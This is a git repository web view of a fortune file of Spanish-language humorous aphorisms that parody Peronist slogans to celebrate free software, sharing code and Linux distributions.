aboutsummaryrefslogtreecommitdiffstats
path: root/fortunes/doctrina_linux
blob: b3bece2f88dbf0d9502d836c6c4382c8ad61aa26 (plain) (blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
1050
1051
1052
1053
1054
1055
1056
1057
1058
1059
1060
1061
1062
1063
1064
1065
1066
1067
1068
1069
1070
1071
1072
1073
1074
1075
1076
1077
1078
1079
1080
1081
1082
1083
1084
1085
1086
1087
1088
1089
1090
1091
1092
1093
1094
1095
1096
1097
1098
1099
1100
1101
1102
1103
1104
1105
1106
1107
1108
1109
1110
1111
1112
1113
1114
1115
1116
1117
1118
1119
1120
1121
1122
1123
1124
1125
1126
1127
1128
1129
1130
1131
1132
1133
1134
1135
1136
1137
1138
1139
1140
1141
1142
1143
1144
1145
1146
1147
1148
1149
1150
1151
1152
1153
1154
1155
1156
1157
1158
1159
1160
1161
1162
1163
1164
1165
1166
1167
1168
1169
1170
1171
1172
1173
1174
1175
1176
1177
1178
1179
1180
1181
1182
1183
1184
1185
1186
1187
1188
1189
1190
1191
1192
1193
1194
1195
1196
1197
1198
1199
1200
1201
1202
1203
1204
1205
1206
1207
1208
1209
1210
1211
1212
1213
1214
1215
1216
1217
1218
1219
1220
1221
1222
1223
1224
1225
1226
1227
1228
1229
1230
1231
1232
1233
1234
1235
1236
1237
1238
1239
1240
1241
1242
1243
1244
1245
1246
1247
1248
1249
1250
1251
1252
1253
1254
1255
1256
1257
1258
1259
1260
1261
1262
1263
1264
1265
1266
1267
1268
1269
1270
1271
1272
1273
1274
1275
1276
1277
1278
1279
1280
1281
1282
1283
1284
1285
1286
1287
1288
1289
1290
1291
1292
1293
1294
1295
1296
1297
1298
1299
1300
1301
1302
1303
1304
1305
1306
1307
1308
1309
1310
1311
1312
1313
1314
1315
1316
1317
1318
1319
1320
1321
1322
1323
1324
1325
1326
1327
1328
1329
1330
1331
1332
1333
1334
1335
1336
1337
1338
1339
1340
1341
1342
1343
1344
1345
1346
1347
1348
1349
1350
1351
1352
1353
1354
1355
1356
1357
1358
1359
1360
1361
1362
1363
1364
1365
1366
1367
1368
1369
1370
1371
1372
1373
1374
1375
1376
1377
1378
1379
1380
1381
1382
1383
1384
1385
1386
1387
1388
1389
1390
1391
1392
1393
1394
1395
1396
1397
1398
1399
1400
1401
1402
1403
1404
1405
1406
1407
1408
1409
1410
1411
1412
1413
1414
1415
1416
1417
1418
1419
1420
1421
1422
1423
1424
1425
1426
1427
1428
1429
1430
1431
1432
1433
1434
1435
1436
1437
1438
1439
1440
1441
1442
1443
1444
1445
1446
1447
1448
1449
1450
1451
1452
1453
1454
1455
1456
1457
1458
1459
1460
1461
1462
1463
1464
1465
1466
1467
1468
1469
1470
1471
1472
1473
1474
1475
1476
1477
1478
1479
1480
1481
1482
1483
1484
1485
1486
1487
1488
1489
1490
1491
1492
1493
1494
1495
1496
1497
1498
1499
1500
1501
1502
1503
1504
1505
1506
1507
1508
1509
1510
1511
1512
1513
1514
1515
1516
1517
1518
1519
1520
1521
1522
1523
1524
1525
1526
1527
1528
1529
1530
1531
1532
1533
1534
1535
1536
1537
1538
1539
1540
1541
1542
1543
1544
1545
1546
1547
1548
1549
1550
1551
1552
1553
1554
1555
1556
1557
1558
1559
1560
1561
1562
1563
1564
1565
1566
1567
1568
1569
1570
1571
1572
1573
1574
1575
1576
1577
1578
1579
1580
1581
1582
1583
1584
1585
1586
1587
1588
1589
1590
1591
1592
1593
1594
1595
1596
1597
1598
1599
1600
1601
1602
1603
1604
1605
1606
1607
1608
1609
1610
1611
1612
1613
1614
1615
1616
1617
1618
1619
1620
1621
1622
1623
1624
1625
1626
1627
1628
1629
1630
1631
1632
1633
1634
1635
1636
1637
1638
1639
1640
1641
1642
1643
1644
1645
1646
1647
1648
1649
1650
1651
1652
1653
1654
1655
1656
1657
1658
1659
1660
1661
1662
1663
1664
1665
1666
1667
1668
1669
1670
1671
1672
1673
1674
1675
1676
1677
1678
1679
1680
1681
1682
1683
1684
1685
1686
1687
1688
1689
1690
1691
1692
1693
1694
1695
1696
1697
1698
1699
1700
1701
1702
1703
1704
1705
1706
1707
1708
1709
1710
1711
1712
1713
1714
1715
1716
1717
1718
1719
1720
1721
1722
1723
1724
1725
1726
1727
1728
1729
1730
1731
1732
1733
1734
1735
1736
1737
1738
1739
1740
1741
1742
1743
1744
1745
1746
1747
1748
1749
1750
1751
1752
1753
1754
1755
1756
1757
1758
1759
1760
1761
1762
1763
1764
1765
1766
1767
1768
1769
1770
1771
1772
1773
1774
1775
1776
1777
1778
1779
1780
1781
1782
1783
1784
1785
1786
1787
1788
1789
1790
1791
1792
1793
1794
1795
1796
1797
1798
1799
1800
1801
1802
1803
1804
1805
1806
1807
1808
1809
1810
1811
1812
1813
1814
1815
1816
1817
1818
1819
1820
1821
1822
1823
1824
1825
1826
1827
1828
1829
1830
1831
1832
1833
1834
1835
1836
1837
1838
1839
1840
1841
1842
1843
1844
1845
1846
1847
1848
1849
1850
1851
1852
1853
1854
1855
1856
1857
1858
1859
1860
1861
1862
1863
1864
1865
1866
1867
1868
1869
1870
1871
1872
1873
1874
1875
1876
1877
1878
1879
1880
1881
1882
1883
1884
1885
1886
1887
1888
1889
1890
1891
1892
1893
1894
1895
1896
1897
1898
1899
1900
1901
1902
1903
1904
1905
1906
1907
1908
1909
1910
1911
1912
1913
1914
1915
1916
1917
1918
1919
1920
1921
1922
1923
1924
1925
1926
1927
1928
1929
1930
1931
1932
1933
1934
1935
1936
1937
1938
1939
1940
1941
1942
1943
1944
1945
1946
1947
1948
1949
1950
1951
1952
1953
1954
1955
1956
1957
1958
1959
1960
1961
1962
1963
1964
1965
1966
1967
1968
1969
1970
1971
1972
1973
1974
1975
1976
1977
1978
1979
1980
1981
1982
1983
1984
1985
1986
1987
1988
1989
1990
1991
1992
1993
1994
1995
1996
1997
1998
1999
2000
2001
2002
2003
2004
2005
2006
2007
2008
2009
2010
2011
2012
2013
2014
2015
2016
2017
2018
2019
2020
2021
2022
2023
2024
2025
2026
2027
2028
2029
2030
2031
2032
2033
2034
2035
2036
2037
2038
2039
2040
2041
2042
2043
2044
2045
2046
2047
2048
2049
2050
2051
2052
2053
2054
2055
2056
2057
2058
2059
2060
2061
2062
2063
2064
2065
2066
2067
2068
2069
2070
2071
2072
2073
2074
2075
2076
2077
2078
2079
2080
2081
2082
2083
2084
2085
2086
2087
2088
2089
2090
2091
2092
2093
2094
2095
2096
2097
2098
2099
2100
2101
2102
2103
2104
2105
2106
2107
2108
2109
2110
2111
2112
2113
2114
2115
2116
2117
2118
2119
2120
2121
2122
2123
2124
2125
2126
2127
2128
2129
2130
2131
2132
2133
2134
2135
2136
2137
2138
2139
2140
2141
2142
2143
2144
2145
2146
2147
2148
2149
2150
2151
2152
2153
2154
2155
2156
2157
2158
2159
2160
2161
2162
2163
2164
2165
2166
2167
2168
2169
2170
2171
2172
2173
2174
2175
2176
2177
2178
2179
2180
2181
2182
2183
2184
2185
2186
2187
2188
2189
2190
2191
2192
2193
2194
2195
2196
2197
2198
2199
2200
2201
2202
2203
2204
2205
2206
2207
2208
2209
2210
2211
2212
2213
2214
2215
2216
2217
2218
2219
2220
2221
2222
2223
2224
2225
2226
2227
2228
2229
2230
2231
2232
2233
2234
2235
2236
2237
2238
2239
2240
2241
2242
2243
2244
2245
2246
2247
2248
2249
2250
2251
2252
2253
2254
2255
2256
2257
2258
2259
2260
2261
2262
2263
2264
2265
2266
2267
2268
2269
2270
2271
2272
2273
2274
2275
2276
2277
2278
2279
2280
2281
2282
2283
2284
2285
2286
2287
2288
2289
2290
2291
2292
2293
2294
2295
2296
2297
2298
2299
2300
2301
2302
2303
2304
2305
2306
2307
2308
2309
2310
2311
2312
2313
2314
2315
2316
2317
2318
2319
2320
2321
2322
2323
2324
2325
2326
2327
2328
2329
2330
2331
2332
2333
2334
2335
2336
2337
2338
2339
2340
2341
2342
2343
2344
2345
2346
2347
2348
2349
2350
2351
2352
2353
2354
2355
2356
2357
2358
2359
2360
2361
2362
2363
2364
2365
2366
2367
2368
2369
2370
2371
2372
2373
2374
2375
2376
2377
2378
2379
2380
2381
2382
2383
2384
2385
2386
2387
2388
2389
2390
2391
2392
2393
2394
2395
2396
2397
2398
2399
2400
2401
2402
2403
2404
2405
2406
2407
2408
2409
2410
2411
2412
2413
2414
2415
2416
2417
2418
2419
2420
2421
2422
2423
2424
2425
2426
2427
2428
2429
2430
2431
2432
2433
2434
2435
2436
2437
2438
2439
2440
2441
2442
2443
2444
2445
2446
2447
2448
2449
2450
2451
2452
2453
2454
2455
2456
2457
2458
2459
2460
2461
2462
2463
2464
2465
2466
2467
2468
2469
2470
2471
2472
2473
2474
2475
2476
2477
2478
2479
2480
2481
2482
2483
2484
2485
2486
2487
2488
2489
2490
2491
2492
2493
2494
2495
2496
2497
2498
2499
2500
2501
2502
2503
2504
2505
2506
2507
2508
2509
2510
2511
2512
2513
2514
2515
2516
2517
2518
2519
2520
2521
2522
2523
2524
2525
2526
2527
2528
2529
2530
2531
2532
2533
2534
2535
2536
2537
2538
2539
2540
2541
2542
2543
2544
2545
2546
2547
2548
2549
2550
2551
2552
2553
2554
2555
2556
2557
2558
2559
2560
2561
2562
2563
2564
2565
2566
2567
2568
2569
2570
2571
2572
2573
2574
2575
2576
2577
2578
2579
2580
2581
2582
2583
2584
2585
2586
2587
2588
2589
2590
2591
2592
2593
2594
2595
2596
2597
2598
2599
2600
2601
2602
2603
2604
2605
2606
2607
2608
2609
2610
2611
2612
2613
2614
2615
2616
2617
2618
2619
2620
2621
2622
2623
2624
2625
2626
2627
2628
2629
2630
2631
2632
2633
2634
2635
2636
2637
2638
2639
2640
2641
2642
2643
2644
2645
2646
2647
2648
2649
2650
2651
2652
2653
2654
2655
2656
2657
2658
2659
2660
2661
2662
2663
2664
2665
2666
2667
2668
2669
2670
2671
2672
2673
2674
2675
2676
2677
2678
2679
2680
2681
2682
2683
2684
2685
2686
2687
2688
2689
2690
2691
2692
2693
2694
2695
2696
2697
2698
2699
2700
2701
2702
2703
2704
2705
2706
2707
2708
2709
2710
2711
2712
2713
2714
2715
2716
2717
2718
2719
2720
2721
2722
2723
2724
2725
2726
2727
2728
2729
2730
2731
2732
2733
2734
2735
2736
2737
2738
2739
2740
2741
2742
2743
2744
2745
2746
2747
2748
2749
2750
2751
2752
2753
2754
2755
2756
2757
2758
2759
2760
2761
2762
2763
2764
2765
2766
2767
2768
2769
2770
2771
2772
2773
2774
2775
2776
2777
2778
2779
2780
2781
2782
2783
2784
2785
2786
2787
2788
2789
2790
2791
2792
2793
2794
2795
2796
2797
2798
2799
2800
2801
2802
2803
2804
2805
2806
2807
2808
2809
2810
2811
2812
2813
2814
2815
2816
2817
2818
2819
2820
2821
2822
2823
2824
2825
2826
2827
2828
2829
2830
2831
2832
2833
2834
2835
2836
2837
2838
2839
2840
2841
2842
2843
2844
2845
2846
2847
2848
2849
2850
2851
2852
2853
2854
2855
2856
2857
2858
2859
2860
2861
2862
2863
2864
2865
2866
2867
2868
2869
2870
2871
2872
2873
2874
2875
2876
2877
2878
2879
2880
2881
2882
2883
2884
2885
2886
2887
2888
2889
2890
2891
2892
2893
2894
2895
2896
2897
2898
2899
2900
2901
2902
2903
2904
2905
2906
2907
2908
2909
2910
2911
2912
2913
2914
2915
2916
2917
2918
2919
2920
2921
2922
2923
2924
2925
2926
2927
2928
2929
2930
2931
2932
2933
2934
2935
2936
2937
2938
2939
2940
2941
2942
2943
2944
2945
2946
2947
2948
2949
2950
2951
2952
2953
2954
2955
2956
2957
2958
2959
2960
2961
2962
2963
2964
2965
2966
2967
2968
2969
2970
2971
2972
2973
2974
2975
2976
2977
2978
2979
2980
2981
2982
2983
2984
2985
2986
2987
2988
2989
2990
2991
2992
2993
2994
2995
2996
2997
2998
2999
3000
3001
3002
3003
3004
3005
3006
3007
3008
3009
3010
3011
3012
3013
3014
3015
3016
3017
3018
3019
3020
3021
3022
3023
3024
3025
3026
3027
3028
3029
3030
3031
3032
3033
3034
3035
3036
3037
3038
3039
3040
3041
3042
3043
3044
3045
3046
3047
3048
3049
3050
3051
3052
3053
3054
3055
3056
3057
3058
3059
3060
3061
3062
3063
3064
3065
3066
3067
3068
3069
3070
3071
3072
3073
3074
3075
3076
3077
3078
3079
3080
3081
3082
3083
3084
3085
3086
3087
3088
3089
3090
3091
3092
3093
3094
3095
3096
3097
3098
3099
3100
3101
3102
3103
3104
3105
3106
3107
3108
3109
3110
3111
3112
3113
3114
3115
3116
3117
3118
3119
3120
3121
3122
3123
3124
3125
3126
3127
3128
3129
3130
3131
3132
3133
3134
3135
3136
3137
3138
3139
3140
3141
3142
3143
3144
3145
3146
3147
3148
3149
3150
3151
3152
3153
3154
3155
3156
3157
3158
3159
3160
3161
3162
3163
3164
3165
3166
3167
3168
3169
3170
3171
3172
3173
3174
3175
3176
3177
3178
3179
3180
3181
3182
3183
3184
3185
3186
3187
3188
3189
3190
3191
3192
3193
3194
3195
3196
3197
3198
3199
3200
3201
3202
3203
3204
3205
3206
3207
3208
3209
3210
3211
3212
3213
3214
3215
3216
3217
3218
3219
3220
3221
3222
3223
3224
3225
3226
3227
3228
3229
3230
3231
3232
3233
3234
3235
3236
3237
3238
3239
3240
3241
3242
3243
3244
3245
3246
3247
3248
3249
3250
3251
3252
3253
3254
3255
3256
3257
3258
3259
3260
3261
3262
3263
3264
3265
3266
3267
3268
3269
3270
3271
3272
3273
3274
3275
3276
3277
3278
3279
3280
3281
3282
3283
3284
3285
3286
3287
3288
3289
3290
3291
3292
3293
3294
3295
3296
3297
3298
3299
3300
3301
3302
3303
3304
3305
3306
3307
3308
3309
3310
3311
3312
3313
3314
3315
3316
3317
3318
3319
3320
3321
3322
3323
3324
3325
3326
3327
3328
3329
3330
3331
3332
3333
3334
3335
3336
3337
3338
3339
3340
3341
3342
3343
3344
3345
3346
3347
3348
3349
3350
3351
3352
3353
3354
3355
3356
3357
3358
3359
3360
3361
3362
3363
3364
3365
3366
3367
3368
3369
3370
3371
3372
3373
3374
3375
3376
3377
3378
3379
3380
3381
3382
3383
3384
3385
3386
3387
3388
3389
3390
3391
3392
3393
3394
3395
3396
3397
3398
3399
3400
3401
3402
3403
3404
3405
3406
3407
3408
3409
3410
3411
3412
3413
3414
3415
3416
3417
3418
3419
3420
3421
3422
3423
3424
3425
3426
3427
3428
3429
3430
3431
3432
3433
3434
3435
3436
3437
3438
3439
3440
3441
3442
3443
3444
3445
3446
3447
3448
3449
3450
3451
3452
3453
3454
3455
3456
3457
3458
3459
3460
3461
3462
3463
3464
3465
3466
3467
3468
3469
3470
3471
3472
3473
3474
3475
3476
3477
3478
3479
3480
3481
3482
3483
3484
3485
3486
3487
3488
3489
3490
3491
3492
3493
3494
3495
3496
3497
3498
3499
3500
3501
3502
3503
3504
3505
3506
3507
3508
3509
3510
3511
3512
3513
3514
3515
3516
3517
3518
3519
3520
3521
3522
3523
3524
3525
3526
3527
3528
3529
3530
3531
3532
3533
3534
3535
3536
3537
3538
3539
3540
3541
3542
3543
3544
3545
3546
3547
3548
3549
3550
3551
3552
3553
3554
3555
3556
3557
3558
3559
3560
3561
3562
3563
3564
3565
3566
3567
3568
3569
3570
3571
3572
3573
3574
3575
3576
3577
3578
3579
3580
3581
3582
3583
3584
3585
3586
3587
3588
3589
3590
3591
3592
3593
3594
3595
3596
3597
3598
3599
3600
3601
3602
3603
3604
3605
3606
3607
3608
3609
3610
3611
3612
3613
3614
3615
3616
3617
3618
3619
3620
3621
3622
3623
3624
3625
3626
3627
3628
3629
3630
3631
3632
3633
3634
3635
3636
3637
3638
3639
3640
3641
3642
3643
3644
3645
3646
3647
3648
3649
3650
3651
3652
3653
3654
3655
3656
3657
3658
3659
3660
3661
3662
3663
3664
3665
3666
3667
3668
3669
3670
3671
3672
3673
3674
3675
3676
3677
3678
3679
3680
3681
3682
3683
3684
3685
3686
3687
3688
3689
3690
3691
3692
3693
3694
3695
3696
3697
3698
3699
3700
3701
3702
3703
3704
3705
3706
3707
3708
3709
3710
3711
3712
3713
3714
3715
3716
3717
3718
3719
3720
3721
3722
3723
3724
3725
3726
3727
3728
3729
3730
3731
3732
3733
3734
3735
3736
3737
3738
3739
3740
3741
3742
3743
3744
3745
3746
3747
3748
3749
3750
3751
3752
3753
3754
3755
3756
3757
3758
3759
3760
3761
3762
3763
3764
3765
3766
3767
3768
3769
3770
3771
3772
3773
3774
3775
3776
3777
3778
3779
3780
3781
3782
3783
3784
3785
3786
3787
3788
3789
3790
3791
3792
3793
3794
3795
3796
3797
3798
3799
3800
3801
3802
3803
3804
3805
3806
3807
3808
3809
3810
3811
3812
3813
3814
3815
3816
3817
3818
3819
3820
3821
3822
3823
3824
3825
3826
3827
3828
3829
3830
3831
3832
3833
3834
3835
3836
3837
3838
3839
3840
3841
3842
3843
3844
3845
3846
3847
3848
3849
3850
3851
3852
3853
3854
3855
3856
3857
3858
3859
3860
3861
3862
3863
3864
3865
3866
3867
3868
3869
3870
3871
3872
3873
3874
3875
3876
3877
3878
3879
3880
3881
3882
3883
3884
3885
3886
3887
3888
3889
3890
3891
3892
3893
3894
3895
3896
3897
3898
3899
3900
3901
3902
3903
3904
3905
3906
3907
3908
3909
3910
3911
3912
3913
3914
3915
3916
3917
3918
3919
3920
3921
3922
3923
3924
3925
3926
3927
3928
3929
3930
3931
3932
3933
3934
3935
3936
3937
3938
3939
3940
3941
3942
3943
3944
3945
3946
3947
3948
3949
3950
3951
3952
3953
3954
3955
3956
3957
3958
3959
3960
3961
3962
3963
3964
3965
3966
3967
3968
3969
3970
3971
3972
3973
3974
3975
3976
3977
3978
3979
3980
3981
3982
3983
3984
3985
3986
3987
3988
3989
3990
3991
3992
3993
3994
3995
3996
3997
3998
3999
4000
4001
4002
4003
4004
4005
4006
4007
4008
4009
4010
4011
4012
4013
4014
4015
4016
4017
4018
4019
4020
4021
4022
4023
4024
4025
4026
4027
4028
4029
4030
4031
4032
4033
4034
4035
4036
4037
4038
4039
4040
4041
4042
4043
4044
4045
4046
4047
4048
4049
4050
4051
4052
4053
4054
4055
4056
4057
4058
4059
4060
4061
4062
4063
4064
4065
4066
4067
4068
4069
4070
4071
4072
4073
4074
4075
4076
4077
4078
4079
4080
4081
4082
4083
4084
4085
4086
4087
4088
4089
4090
4091
4092
4093
4094
4095
4096
4097
4098
4099
4100
4101
4102
4103
4104
4105
4106
4107
4108
4109
4110
4111
4112
4113
4114
4115
4116
4117
4118
4119
4120
4121
4122
4123
4124
4125
4126
4127
4128
4129
4130
4131
4132
4133
4134
4135
4136
4137
4138
4139
4140
4141
4142
4143
4144
4145
4146
4147
4148
4149
4150
4151
4152
4153
4154
4155
4156
4157
4158
4159
4160
4161
4162
4163
4164
4165
4166
4167
4168
4169
4170
4171
4172
4173
4174
4175
4176
4177
4178
4179
4180
4181
4182
4183
4184
4185
4186
4187
4188
4189
4190
4191
4192
4193
4194
4195
4196
4197
4198
4199
4200
4201
4202
4203
4204
4205
4206
4207
4208
4209
4210
4211
4212
4213
4214
4215
4216
4217
4218
4219
4220
4221
4222
4223
4224
4225
4226
4227
4228
4229
4230
4231
4232
4233
4234
4235
4236
4237
4238
4239
4240
4241
4242
4243
4244
4245
4246
4247
4248
4249
4250
4251
4252
4253
4254
4255
4256
4257
4258
4259
4260
4261
4262
4263
4264
4265
4266
4267
4268
4269
4270
4271
4272
4273
4274
4275
4276
4277
4278
4279
4280
4281
4282
4283
4284
4285
4286
4287
4288
4289
4290
4291
4292
4293
4294
4295
4296
4297
4298
4299
4300
4301
4302
4303
4304
4305
4306
4307
4308
4309
4310
4311
4312
4313
4314
4315
4316
4317
4318
4319
4320
4321
4322
4323
4324
4325
4326
4327
4328
4329
4330
4331
4332
4333
4334
4335
4336
4337
4338
4339
4340
4341
4342
4343
4344
4345
4346
4347
4348
4349
4350
4351
4352
4353
4354
4355
4356
4357
4358
4359
4360
4361
4362
4363
4364
4365
4366
4367
4368
4369
4370
4371
4372
4373
4374
4375
4376
4377
4378
4379
4380
4381
4382
4383
4384
4385
4386
4387
4388
4389
4390
4391
4392
4393
4394
4395
4396
4397
4398
4399
4400
4401
4402
4403
4404
4405
4406
4407
4408
4409
4410
4411
4412
4413
4414
4415
4416
4417
4418
4419
4420
4421
4422
4423
4424
4425
4426
4427
4428
4429
4430
4431
4432
4433
4434
4435
4436
4437
4438
4439
4440
4441
4442
4443
4444
4445
4446
4447
4448
4449
4450
4451
4452
4453
4454
4455
4456
4457
4458
4459
4460
4461
4462
4463
4464
4465
4466
4467
4468
4469
4470
4471
4472
4473
4474
4475
4476
4477
4478
4479
4480
4481
4482
4483
4484
4485
4486
4487
4488
4489
4490
4491
4492
4493
4494
4495
4496
4497
4498
4499
4500
4501
4502
4503
4504
4505
4506
4507
4508
4509
4510
4511
4512
4513
4514
4515
4516
4517
4518
4519
4520
4521
4522
4523
4524
4525
4526
4527
4528
4529
4530
4531
4532
4533
4534
4535
4536
4537
4538
4539
4540
4541
4542
4543
4544
4545
4546
4547
4548
4549
4550
4551
4552
4553
4554
4555
4556
4557
4558
4559
4560
4561
4562
4563
4564
4565
4566
4567
4568
4569
4570
4571
4572
4573
4574
4575
4576
4577
4578
4579
4580
4581
4582
4583
4584
4585
4586
4587
4588
4589
4590
4591
4592
4593
4594
4595
4596
4597
4598
4599
4600
4601
4602
4603
4604
4605
4606
4607
4608
4609
4610
4611
4612
4613
4614
4615
4616
4617
4618
4619
4620
4621
4622
4623
4624
4625
4626
4627
4628
4629
4630
4631
4632
4633
4634
4635
4636
4637
4638
4639
4640
4641
4642
4643
4644
4645
4646
4647
4648
4649
4650
4651
4652
4653
4654
4655
4656
4657
4658
4659
4660
4661
4662
4663
4664
4665
4666
4667
4668
4669
4670
4671
4672
4673
4674
4675
4676
4677
4678
4679
4680
4681
4682
4683
4684
4685
4686
4687
4688
4689
4690
4691
4692
4693
4694
4695
4696
4697
4698
4699
4700
4701
4702
4703
4704
4705
4706
4707
4708
4709
4710
4711
4712
4713
4714
4715
4716
4717
4718
4719
4720
4721
4722
4723
4724
4725
4726
4727
4728
4729
4730
4731
4732
4733
4734
4735
4736
4737
4738
4739
4740
4741
4742
4743
4744
4745
4746
4747
4748
4749
4750
4751
4752
4753
4754
4755
4756
4757
4758
4759
4760
4761
4762
4763
4764
4765
4766
4767
4768
4769
4770
4771
4772
4773
4774
4775
4776
4777
4778
4779
4780
4781
4782
4783
4784
4785
4786
4787
4788
4789
4790
4791
4792
4793
4794
4795
4796
4797
4798
4799
4800
4801
4802
4803
4804
4805
4806
4807
4808
4809
4810
4811
4812
4813
4814
4815
4816
4817
4818
4819
4820
4821
4822
4823
4824
4825
4826
4827
4828
4829
4830
4831
4832
4833
4834
4835
4836
4837
4838
4839
4840
4841
4842
4843
4844
4845
4846
4847
4848
4849
4850
4851
4852
4853
4854
4855
4856
4857
4858
4859
4860
4861
4862
4863
4864
4865
4866
4867
4868
4869
4870
4871
4872
4873
4874
4875
4876
4877
4878
4879
4880
4881
4882
4883
4884
4885
4886
4887
4888
4889
4890
4891
4892
4893
4894
4895
4896
4897
4898
4899
4900
4901
4902
4903
4904
4905
4906
4907
4908
4909
4910
4911
4912
4913
4914
4915
4916
4917
4918
4919
4920
4921
4922
4923
4924
4925
4926
4927
4928
4929
4930
4931
4932
4933
4934
4935
4936
4937
4938
4939
4940
4941
4942
4943
4944
4945
4946
4947
4948
4949
4950
4951
4952
4953
4954
4955
4956
4957
4958
4959
4960
4961
4962
4963
4964
4965
4966
4967
4968
4969
4970
4971
4972
4973
4974
4975
4976
4977
4978
4979
4980
4981
4982
4983
4984
4985
4986
4987
4988
4989
4990
4991
4992
4993
4994
4995
4996
4997
4998
4999
5000
5001
5002
5003
5004
5005
5006
5007
5008
5009
5010
5011
5012
5013
5014
5015
5016
5017
5018
5019
5020
5021
5022
5023
5024
5025
5026
5027
5028
5029
5030
5031
5032
5033
5034
5035
5036
5037
5038
5039
5040
5041
5042
5043
5044
5045
5046
5047
5048
5049
5050
5051
5052
5053
5054
5055
5056
5057
5058
5059
5060
5061
5062
5063
5064
5065
5066
5067
5068
5069
5070
5071
5072
5073
5074
5075
5076
5077
5078
5079
5080
5081
5082
5083
5084
5085
5086
5087
5088
5089
5090
5091
5092
5093
5094
5095
5096
5097
5098
5099
5100
5101
5102
5103
5104
5105
5106
5107
5108
5109
5110
5111
5112
5113
5114
5115
5116
5117
5118
5119
5120
5121
5122
5123
5124
5125
5126
5127
5128
5129
5130
5131
5132
5133
5134
5135
5136
5137
5138
5139
5140
5141
5142
5143
5144
5145
5146
5147
5148
5149
5150
5151
5152
5153
5154
5155
5156
5157
5158
5159
5160
5161
5162
5163
5164
5165
5166
5167
5168
5169
5170
5171
5172
5173
La verdadera computación es aquella donde la CPU hace lo que el usuario quiere, y defiende un sólo interés: el del usuario.
%
En la acción política la escala de valores de todo peronista es la siguiente: primero la libertad de ejecución, después la de copia, y luego los Hombres.
%
Si tiene CPU, puede peronizarse.
%
Compartir software es Libertar.
%
Todo software libre ha de poder trabajar junto con otro software libre: para un software libre no ha de haber nada mejor que otro software libre.
%
A los muchachos les gusta ponerse calificativos. Los hay Ubunteros, los hay Debianeros, los hay Fedoreros, los hay OpenBSDeros. Pero todos trabajan...
%
En nuestro sistema los únicos privilegiados son los usuarios.
%
Un hardware sin software es como un cuerpo sin alma. Por eso el peronismo usa software libre.
%
Lo mejor viene en kilobytes.
%
Mejor que copiar es compartir, mejor que ejecutar es compilar.
%
Byte compartido es byte liberado.
%
